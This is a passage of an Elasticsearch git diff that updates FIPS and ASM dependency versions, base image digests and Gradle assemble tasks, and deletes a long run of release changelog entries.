distribution/bwc/minor4/build.gradle diff --git a/distribution/docker/build.gradle b/distribution/docker/build.gradle index e3f87117ea029..55c859c679d74 100644 --- a/distribution/docker/build.gradle +++ b/distribution/docker/build.gradle @@ -129,7 +129,7 @@ dependencies { metricbeat_fips_aarch64 "beats:metricbeat-fips:${VersionProperties.elasticsearch}:linux-arm64@tar.gz" metricbeat_fips_x86_64 "beats:metricbeat-fips:${VersionProperties.elasticsearch}:linux-x86_64@tar.gz" - fips "org.bouncycastle:bc-fips:1.0.2.5" + fips "org.bouncycastle:bc-fips:1.0.2.6" fips "org.bouncycastle:bctls-fips:1.0.19" } @@ -659,7 +659,7 @@ subprojects { Project subProject -> it.setCompression(Compression.GZIP) it.getArchiveBaseName().set("elasticsearch${base.suffix}-${VersionProperties.elasticsearch}-docker-image") it.getArchiveVersion().set("") - it.getArchiveClassifier().set(architecture == Architecture.AARCH64 ? 'aarch64' : '') + it.getArchiveClassifier().set(architecture.dockerClassifier) it.getDestinationDirectory().set(new File(project.parent.buildDir, 'distributions')) it.dependsOn(exportTask) } @@ -668,6 +668,11 @@ subprojects { Project subProject -> dependsOn compressExportTask } + tasks.named('assemble').configure { + dependsOn exportTask + } + + // deprecated here for backwards compatibility of DistroTestPlugin and DistributionDownloadPlugin artifacts.add('default', file(tarFile)) { type = 'tar' name = artifactName diff --git a/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile b/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile index 75acc7f59c7a5..86cf8ca198f8b 100644 --- a/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile +++ b/distribution/docker/src/docker/dockerfiles/cloud_ess_fips/Dockerfile @@ -1,5 +1,6 @@ ################################################################################ -# This Dockerfile was generated from the template at distribution/src/docker/Dockerfile +# This Dockerfile was generated from the template at +# distribution/src/docker/dockerfiles/cloud_ess_fips/Dockerfile # # Beginning of multi stage Dockerfile ################################################################################ @@ -24,7 +25,7 @@ # Extract Elasticsearch artifact ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:68e0781cd592beda39880428985d5fecca1cf2abb18365da73bf1f7ebd994974 AS builder +FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:e5602c71dfc1c1d9009f7368615e8a25480aa1c2c6e61ef7c00ce130a40def17 AS builder # Install required packages to extract the Elasticsearch distribution RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && ${package_manager} update && ${package_manager} update && ${package_manager} add --no-cache curl") %> @@ -103,14 +104,14 @@ WORKDIR /usr/share/elasticsearch/config # Add entrypoint ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:68e0781cd592beda39880428985d5fecca1cf2abb18365da73bf1f7ebd994974 +FROM docker.elastic.co/wolfi/chainguard-base-fips:latest@sha256:e5602c71dfc1c1d9009f7368615e8a25480aa1c2c6e61ef7c00ce130a40def17 RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && \n" + " ${package_manager} update && \n" + " ${package_manager} upgrade && \n" + " ${package_manager} add --no-cache \n" + - " bash java-cacerts curl libstdc++ libsystemd netcat-openbsd p11-kit p11-kit-trust posix-libc-utils shadow tini unzip zip zstd && \n" + + " bash java-cacerts curl libstdc++ libsystemd netcat-openbsd p11-kit p11-kit-trust posix-libc-utils shadow tini unzip zip zstd wget && \n" + " rm -rf /var/cache/apk/* " ) %> @@ -162,7 +163,7 @@ RUN printf "\\n" | jdk/bin/keytool -importkeystore \ -deststorepass passwordcacert \ -deststoretype BCFKS \ -providerclass org.bouncycastle.jcajce.provider.BouncyCastleFipsProvider \ - -providerpath lib/bc-fips-1.0.2.5.jar \ + -providerpath lib/bc-fips-1.0.2.6.jar \ -destprovidername BCFIPS diff --git a/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile b/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile index edb6fd2b3e265..0134d9f035a1f 100644 --- a/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile +++ b/distribution/docker/src/docker/dockerfiles/wolfi/Dockerfile @@ -1,5 +1,6 @@ ################################################################################ -# This Dockerfile was generated from the template at distribution/src/docker/Dockerfile +# This Dockerfile was generated from the template at +# distribution/src/docker/dockerfiles/wolfi/Dockerfile # # Beginning of multi stage Dockerfile ################################################################################ @@ -24,7 +25,7 @@ # Extract Elasticsearch artifact ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:3d19648819612728a676ab4061edfb3283bd7117a22c6c4479ee1c1d51831832 AS builder +FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:bb3bb9491f564296956a879033da287961829c431fc8dc68222c2b60f9bfa052 AS builder # Install required packages to extract the Elasticsearch distribution RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && ${package_manager} update && ${package_manager} update && ${package_manager} add --no-cache curl") %> @@ -79,7 +80,7 @@ RUN sed -i -e 's/ES_DISTRIBUTION_TYPE=tar/ES_DISTRIBUTION_TYPE=docker/' bin/elas # Add entrypoint ################################################################################ -FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:3d19648819612728a676ab4061edfb3283bd7117a22c6c4479ee1c1d51831832 +FROM docker.elastic.co/wolfi/chainguard-base:latest@sha256:bb3bb9491f564296956a879033da287961829c431fc8dc68222c2b60f9bfa052 RUN <%= retry.loop(package_manager, "export DEBIAN_FRONTEND=noninteractive && \n" + diff --git a/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml b/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml index 0a2d3ff921675..4a78658aa06d9 100644 --- a/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml +++ b/distribution/docker/src/docker/iron_bank/hardening_manifest.yaml @@ -11,7 +11,7 @@ tags: # Build args passed to Dockerfile ARGs args: BASE_IMAGE: "redhat/ubi/ubi9" - BASE_TAG: "9.5" + BASE_TAG: "9.6" # Docker image labels labels: org.opencontainers.image.title: "elasticsearch" diff --git a/distribution/packages/build.gradle b/distribution/packages/build.gradle index 9129c9a12fc9e..570bccc394a52 100644 --- a/distribution/packages/build.gradle +++ b/distribution/packages/build.gradle @@ -400,6 +400,11 @@ subprojects { String buildTask = "build${it.name.replaceAll(/-[a-z]/) { it.substring(1).toUpperCase() }.capitalize()}" ext.buildDist = parent.tasks.named(buildTask) + tasks.named('assemble').configure { + dependsOn buildDist + } + + // deprecated here for backwards compatibility of DistroTestPlugin and DistributionDownloadPlugin artifacts { 'default' buildDist } diff --git a/distribution/tools/plugin-cli/build.gradle b/distribution/tools/plugin-cli/build.gradle index becdfbdb4d5e5..d3f8a2e2aa0c8 100644 --- a/distribution/tools/plugin-cli/build.gradle +++ b/distribution/tools/plugin-cli/build.gradle @@ -26,11 +26,11 @@ dependencies { implementation project(":libs:plugin-scanner") implementation project(":libs:entitlement") // TODO: asm is picked up from the plugin scanner and entitlements, we should consolidate so it is not defined twice - implementation 'org.ow2.asm:asm:9.7.1' - implementation 'org.ow2.asm:asm-tree:9.7.1' + implementation 'org.ow2.asm:asm:9.8' + implementation 'org.ow2.asm:asm-tree:9.8' api "org.bouncycastle:bcpg-fips:1.0.7.1" - api "org.bouncycastle:bc-fips:1.0.2.5" + api "org.bouncycastle:bc-fips:1.0.2.6" testImplementation project(":test:framework") testImplementation "com.google.jimfs:jimfs:${versions.jimfs}" testRuntimeOnly "com.google.guava:guava:${versions.jimfs_guava}" diff --git a/docs/changelog/106953.yaml b/docs/changelog/106953.yaml deleted file mode 100644 index 6993b1960a401..0000000000000 --- a/docs/changelog/106953.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 106953 -summary: Optimize usage calculation in ILM policies retrieval API -area: ILM+SLM -type: enhancement -issues: - - 105773 diff --git a/docs/changelog/113757.yaml b/docs/changelog/113757.yaml deleted file mode 100644 index 30e173d80b2a7..0000000000000 --- a/docs/changelog/113757.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 113757 -summary: Store arrays offsets for keyword fields natively with synthetic source instead of falling back to ignored source. -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/117642.yaml b/docs/changelog/117642.yaml deleted file mode 100644 index dbddbbf5e64eb..0000000000000 --- a/docs/changelog/117642.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 117642 -summary: Adding endpoint creation validation to `ElasticInferenceService` -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/119546.yaml b/docs/changelog/119546.yaml deleted file mode 100644 index 017bbb845c0a6..0000000000000 --- a/docs/changelog/119546.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 119546 -summary: Introduce `FallbackSyntheticSourceBlockLoader` and apply it to keyword fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/119967.yaml b/docs/changelog/119967.yaml deleted file mode 100644 index be5543be20238..0000000000000 --- a/docs/changelog/119967.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 119967 -summary: Add `index_options` to `semantic_text` field mappings -area: Mapping -type: enhancement -issues: [ ] diff --git a/docs/changelog/119995.yaml b/docs/changelog/119995.yaml deleted file mode 100644 index e9ee8bc5b8458..0000000000000 --- a/docs/changelog/119995.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 119995 -summary: "apm-data: Use representative count as event.success_count if available" -area: Ingest Node -type: bug -issues: [] diff --git a/docs/changelog/120302.yaml b/docs/changelog/120302.yaml deleted file mode 100644 index 29202b4858f80..0000000000000 --- a/docs/changelog/120302.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 120302 -summary: "ESQL: Enhanced `DATE_TRUNC` with arbitrary intervals" -area: ES|QL -type: enhancement -issues: - - 120094 diff --git a/docs/changelog/120363.yaml b/docs/changelog/120363.yaml deleted file mode 100644 index 65e74024bbbbb..0000000000000 --- a/docs/changelog/120363.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120363 -summary: Add thread pool utilization metric -area: "Infra/Metrics" -type: enhancement -issues: [] diff --git a/docs/changelog/120488.yaml b/docs/changelog/120488.yaml deleted file mode 100644 index 8d5b07ad21634..0000000000000 --- a/docs/changelog/120488.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120488 -summary: Publish queue latency metrics from tracked thread pools -area: "Infra/Metrics" -type: enhancement -issues: [] diff --git a/docs/changelog/120751.yaml b/docs/changelog/120751.yaml deleted file mode 100644 index 0c1dffc0e527b..0000000000000 --- a/docs/changelog/120751.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120751 -summary: Adding support for binary embedding type to Cohere service embedding type -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/120774.yaml b/docs/changelog/120774.yaml deleted file mode 100644 index 8157e1725be83..0000000000000 --- a/docs/changelog/120774.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120774 -summary: Retry ES|QL node requests on shard level failures -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/120957.yaml b/docs/changelog/120957.yaml deleted file mode 100644 index 841ef945ce7ef..0000000000000 --- a/docs/changelog/120957.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120957 -summary: Introduce `AllocationBalancingRoundSummaryService` -area: Allocation -type: enhancement -issues: [] diff --git a/docs/changelog/120998.yaml b/docs/changelog/120998.yaml deleted file mode 100644 index 4d9a3aa3eb1c4..0000000000000 --- a/docs/changelog/120998.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 120998 -summary: ES|QL `change_point` processing command -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/121041.yaml b/docs/changelog/121041.yaml deleted file mode 100644 index 44a51a966c0a1..0000000000000 --- a/docs/changelog/121041.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121041 -summary: Support configurable chunking in `semantic_text` fields -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/121106.yaml b/docs/changelog/121106.yaml deleted file mode 100644 index d98c0938c2a7f..0000000000000 --- a/docs/changelog/121106.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121106 -summary: Add `ModelRegistryMetadata` to Cluster State -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/121240.yaml b/docs/changelog/121240.yaml deleted file mode 100644 index b0ca8e5e614db..0000000000000 --- a/docs/changelog/121240.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121240 -summary: Implement runtime skip_unavailable=true -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/121256.yaml b/docs/changelog/121256.yaml deleted file mode 100644 index b4ba7fb3d0149..0000000000000 --- a/docs/changelog/121256.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121256 -summary: Run `TransportEnrichStatsAction` on local node -area: Ingest Node -type: enhancement -issues: [] diff --git a/docs/changelog/121260.yaml b/docs/changelog/121260.yaml deleted file mode 100644 index 40c7487f29b12..0000000000000 --- a/docs/changelog/121260.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121260 -summary: Introduce a pre-mapping logical plan processing step -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/121324.yaml b/docs/changelog/121324.yaml deleted file mode 100644 index d105ea0b46b4c..0000000000000 --- a/docs/changelog/121324.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 121324 -summary: Support duplicate suggestions in completion field -area: Suggesters -type: bug -issues: - - 82432 diff --git a/docs/changelog/121327.yaml b/docs/changelog/121327.yaml deleted file mode 100644 index fc684ea504f3d..0000000000000 --- a/docs/changelog/121327.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121327 -summary: Reduce Data Loss in System Indices Migration -area: Infra/Core -type: bug -issues: [] diff --git a/docs/changelog/121370.yaml b/docs/changelog/121370.yaml deleted file mode 100644 index cfa67bf5b2644..0000000000000 --- a/docs/changelog/121370.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121370 -summary: Improve SLM Health Indicator to cover missing snapshot -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/121548.yaml b/docs/changelog/121548.yaml deleted file mode 100644 index 889a3e81c3f8c..0000000000000 --- a/docs/changelog/121548.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121548 -summary: Adding support for specifying embedding type to Jina AI service settings -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/121784.yaml b/docs/changelog/121784.yaml deleted file mode 100644 index c336205767803..0000000000000 --- a/docs/changelog/121784.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121784 -summary: Optionally allow text similarity reranking to fail -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/121805.yaml b/docs/changelog/121805.yaml deleted file mode 100644 index 7d0f3a96221ae..0000000000000 --- a/docs/changelog/121805.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121805 -summary: Support subset of metrics in aggregate metric double -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/121827.yaml b/docs/changelog/121827.yaml deleted file mode 100644 index 11c9c201655a7..0000000000000 --- a/docs/changelog/121827.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 121827 -summary: Updates to allow using Cohere binary embedding response in semantic search - queries -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/121885.yaml b/docs/changelog/121885.yaml deleted file mode 100644 index 252d0cef2cec1..0000000000000 --- a/docs/changelog/121885.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121885 -summary: Introduce batched query execution and data-node side reduce -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/121920.yaml b/docs/changelog/121920.yaml deleted file mode 100644 index 6f0f4462d52ae..0000000000000 --- a/docs/changelog/121920.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 121920 -summary: Account for the `SearchHit` source in circuit breaker -area: Search -type: enhancement -issues: - - 89656 diff --git a/docs/changelog/121942.yaml b/docs/changelog/121942.yaml deleted file mode 100644 index 4973ebbb4f26c..0000000000000 --- a/docs/changelog/121942.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121942 -summary: Allow partial results in ES|QL -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/121948.yaml b/docs/changelog/121948.yaml deleted file mode 100644 index bfa87dbe51955..0000000000000 --- a/docs/changelog/121948.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 121948 -summary: Add initial grammar and changes for FORK -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/122062.yaml b/docs/changelog/122062.yaml deleted file mode 100644 index 12567bb60217e..0000000000000 --- a/docs/changelog/122062.yaml +++ /dev/null @@ -1,54 +0,0 @@ -pr: 122062 -summary: Upgrade `discovery-ec2` to AWS SDK v2 -area: Discovery-Plugins -type: breaking -issues: [] -breaking: - title: Upgrade `discovery-ec2` to AWS SDK v2 - area: Cluster and node setting - details: >- - - In earlier versions of {es} the `discovery-ec2` plugin was based on the AWS - SDK v1. AWS will withdraw support for this SDK before the end of the life - of {es} {minor-version} so we must migrate to the newer AWS SDK v2. - - Unfortunately there are several differences between the two AWS SDK - versions which may require you to adjust your system configuration when - upgrading to {es} {minor-version} or later. These differences include, but - may not be limited to, the following items. - - * AWS SDK v2 does not support the EC2 IMDSv1 protocol. - - * AWS SDK v2 does not support the `aws.secretKey` or - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system properties. - - * AWS SDK v2 does not permit specifying a choice between HTTP and HTTPS so - the `discovery.ec2.protocol` setting is no longer effective. - - * AWS SDK v2 does not accept an access key without a secret key or vice - versa. - - impact: >- - - If you use the `discovery-ec2` plugin, test your upgrade thoroughly before - upgrading any production workloads. - - Adapt your configuration to the new SDK functionality. This includes, but - may not be limited to, the following items. - - * If you use IMDS to determine the availability zone of a node or to obtain - credentials for accessing the EC2 API, ensure that it supports the IMDSv2 - protocol. - - * If applicable, discontinue use of the `aws.secretKey` and - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system properties. - - * If applicable, specify that you wish to use the insecure HTTP protocol to - access the EC2 API by setting `discovery.ec2.endpoint` to a URL which - starts with `http://`. - - * Either supply both an access key and a secret key using the keystore - settings `discovery.ec2.access_key` and `discovery.ec2.secret_key`, or - configure neither of these settings. - - notable: true diff --git a/docs/changelog/122066.yaml b/docs/changelog/122066.yaml deleted file mode 100644 index 79a9129bd542a..0000000000000 --- a/docs/changelog/122066.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122066 -summary: Adding elser default endpoint for EIS -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/122134.yaml b/docs/changelog/122134.yaml deleted file mode 100644 index 25ca556789525..0000000000000 --- a/docs/changelog/122134.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122134 -summary: Adding integration for VoyageAI embeddings and rerank models -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/122218.yaml b/docs/changelog/122218.yaml deleted file mode 100644 index bfd44399e3e8d..0000000000000 --- a/docs/changelog/122218.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122218 -summary: Integrate with `DeepSeek` API -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/122224.yaml b/docs/changelog/122224.yaml deleted file mode 100644 index 41ae8c6578600..0000000000000 --- a/docs/changelog/122224.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122224 -summary: Enable the use of nested field type with index.mode=time_series -area: Mapping -type: enhancement -issues: - - 120874 diff --git a/docs/changelog/122272.yaml b/docs/changelog/122272.yaml deleted file mode 100644 index 62e5769179402..0000000000000 --- a/docs/changelog/122272.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122272 -summary: "[Inference API] Rename `model_id` prop to model in EIS sparse inference\ - \ request body" -area: Inference -type: enhancement -issues: [] diff --git a/docs/changelog/122280.yaml b/docs/changelog/122280.yaml deleted file mode 100644 index 93a7e4e1aaf57..0000000000000 --- a/docs/changelog/122280.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122280 -summary: Use `FallbackSyntheticSourceBlockLoader` for number fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/122365.yaml b/docs/changelog/122365.yaml deleted file mode 100644 index 1229cd8754ca6..0000000000000 --- a/docs/changelog/122365.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122365 -summary: Fix handling of auto expand replicas for stateless indices -area: "Search" -type: bug -issues: [] diff --git a/docs/changelog/122381.yaml b/docs/changelog/122381.yaml deleted file mode 100644 index 4407482db4765..0000000000000 --- a/docs/changelog/122381.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122381 -summary: Adds implementations of dotProduct and cosineSimilarity painless methods to operate on float vectors for byte fields -area: Vector Search -type: enhancement -issues: - - 117274 diff --git a/docs/changelog/122390.yaml b/docs/changelog/122390.yaml deleted file mode 100644 index 4338519ad60ba..0000000000000 --- a/docs/changelog/122390.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122390 -summary: Add health indicator impact to `HealthPeriodicLogger` -area: Health -type: enhancement -issues: [] diff --git a/docs/changelog/122458.yaml b/docs/changelog/122458.yaml deleted file mode 100644 index e28e22eb363b6..0000000000000 --- a/docs/changelog/122458.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122458 -summary: '`DesiredBalanceReconciler` always returns `AllocationStats`' -area: Allocation -type: bug -issues: [] diff --git a/docs/changelog/122459.yaml b/docs/changelog/122459.yaml deleted file mode 100644 index 9dae5c05f438a..0000000000000 --- a/docs/changelog/122459.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122459 -summary: Double parameter markers for identifiers -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/122486.yaml b/docs/changelog/122486.yaml deleted file mode 100644 index 027d2a5e63ba3..0000000000000 --- a/docs/changelog/122486.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122486 -summary: Add index mode to get data stream API -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/122497.yaml b/docs/changelog/122497.yaml deleted file mode 100644 index 46c385ea4ed46..0000000000000 --- a/docs/changelog/122497.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122497 -summary: Check if index patterns conform to valid format before validation -area: CCS -type: enhancement -issues: [] diff --git a/docs/changelog/122586.yaml b/docs/changelog/122586.yaml deleted file mode 100644 index 1555148b57917..0000000000000 --- a/docs/changelog/122586.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122586 -summary: "ESQL: Fix inconsistent results in using scaled_float field" -area: ES|QL -type: bug -issues: - - 122547 diff --git a/docs/changelog/122615.yaml b/docs/changelog/122615.yaml deleted file mode 100644 index 0070fea6a3b95..0000000000000 --- a/docs/changelog/122615.yaml +++ /dev/null @@ -1,8 +0,0 @@ -pr: 122615 -summary: Enable synthetic recovery source by default when synthetic source is enabled. - Using synthetic recovery source significantly improves indexing performance compared - to regular recovery source. -area: Mapping -type: enhancement -issues: - - 116726 diff --git a/docs/changelog/122637.yaml b/docs/changelog/122637.yaml deleted file mode 100644 index e9c108311d208..0000000000000 --- a/docs/changelog/122637.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122637 -summary: Use `FallbackSyntheticSourceBlockLoader` for `unsigned_long` and `scaled_float` - fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/122638.yaml b/docs/changelog/122638.yaml deleted file mode 100644 index 67c47eb2d957a..0000000000000 --- a/docs/changelog/122638.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 122638 -summary: Expose `input_type` option at root level for `text_embedding` task type in - Perform Inference API -area: Machine Learning -type: enhancement -issues: - - 117856 diff --git a/docs/changelog/122660.yaml b/docs/changelog/122660.yaml deleted file mode 100644 index 57d7ec0976f26..0000000000000 --- a/docs/changelog/122660.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122660 -summary: Render `aggregate_metric_double` -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/122708.yaml b/docs/changelog/122708.yaml deleted file mode 100644 index ec4e75798d473..0000000000000 --- a/docs/changelog/122708.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122708 -summary: Support partial results in CCS in ES|QL -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/122821.yaml b/docs/changelog/122821.yaml deleted file mode 100644 index 8773b6f77c4b6..0000000000000 --- a/docs/changelog/122821.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122821 -summary: Fix functions emitting warnings with no source -area: ES|QL -type: bug -issues: - - 122588 diff --git a/docs/changelog/122823.yaml b/docs/changelog/122823.yaml deleted file mode 100644 index e0d44cc261f2c..0000000000000 --- a/docs/changelog/122823.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122823 -summary: Prevent Query Rule Creation with Invalid Numeric Match Criteria -area: Relevance -type: bug -issues: [] diff --git a/docs/changelog/122852.yaml b/docs/changelog/122852.yaml deleted file mode 100644 index 579404bdc7f0e..0000000000000 --- a/docs/changelog/122852.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122852 -summary: Run `TransportGetDataStreamsAction` on local node -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/122857.yaml b/docs/changelog/122857.yaml deleted file mode 100644 index 6d14acc02f2fe..0000000000000 --- a/docs/changelog/122857.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122857 -summary: Run `TransportGetWatcherSettingsAction` on local node -area: Watcher -type: enhancement -issues: [] diff --git a/docs/changelog/122860.yaml b/docs/changelog/122860.yaml deleted file mode 100644 index 16f234dc17d95..0000000000000 --- a/docs/changelog/122860.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122860 -summary: Improved error message when index field type is invalid -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/122885.yaml b/docs/changelog/122885.yaml deleted file mode 100644 index 818b2fbd4a00e..0000000000000 --- a/docs/changelog/122885.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122885 -summary: Run `TransportExplainLifecycleAction` on local node -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/122890.yaml b/docs/changelog/122890.yaml deleted file mode 100644 index 5f99cc94df361..0000000000000 --- a/docs/changelog/122890.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122890 -summary: Introduce `allow_partial_results` setting in ES|QL -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/122891.yaml b/docs/changelog/122891.yaml deleted file mode 100644 index 35b8865b771d4..0000000000000 --- a/docs/changelog/122891.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122891 -summary: Pragma to load from stored fields -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/122921.yaml b/docs/changelog/122921.yaml deleted file mode 100644 index 3c0da28625b9c..0000000000000 --- a/docs/changelog/122921.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122921 -summary: Run `TransportGetMappingsAction` on local node -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/122933.yaml b/docs/changelog/122933.yaml deleted file mode 100644 index 4b9a58f017ba0..0000000000000 --- a/docs/changelog/122933.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122933 -summary: Run XPack usage actions on local node -area: Stats -type: enhancement -issues: [] diff --git a/docs/changelog/122991.yaml b/docs/changelog/122991.yaml deleted file mode 100644 index e038bca0a86bc..0000000000000 --- a/docs/changelog/122991.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122991 -summary: "GCS blob store: add `OperationPurpose/Operation` stats counters" -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/122999.yaml b/docs/changelog/122999.yaml deleted file mode 100644 index a0134afc59a05..0000000000000 --- a/docs/changelog/122999.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122999 -summary: Store arrays offsets for ip fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/123044.yaml b/docs/changelog/123044.yaml deleted file mode 100644 index 2cb758c23edec..0000000000000 --- a/docs/changelog/123044.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123044 -summary: Adding validation to `ElasticsearchInternalService` -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/123074.yaml b/docs/changelog/123074.yaml deleted file mode 100644 index 59ca1524893f8..0000000000000 --- a/docs/changelog/123074.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123074 -summary: Adding ES|QL Reranker command in snapshot builds -area: Ranking -type: feature -issues: [] diff --git a/docs/changelog/123085.yaml b/docs/changelog/123085.yaml deleted file mode 100644 index 316b1f6f26705..0000000000000 --- a/docs/changelog/123085.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123085 -summary: Remove duplicated nested commands -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/123150.yaml b/docs/changelog/123150.yaml deleted file mode 100644 index d9c9072f6213e..0000000000000 --- a/docs/changelog/123150.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123150 -summary: Limit the number of chunks for semantic text to prevent high memory usage -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/123156.yaml b/docs/changelog/123156.yaml deleted file mode 100644 index 6d220c8c585df..0000000000000 --- a/docs/changelog/123156.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123156 -summary: Wrap remote errors with cluster name to provide more context -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/123187.yaml b/docs/changelog/123187.yaml deleted file mode 100644 index 46bb7e4bab519..0000000000000 --- a/docs/changelog/123187.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123187 -summary: Add bit vector support to semantic text -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/123396.yaml 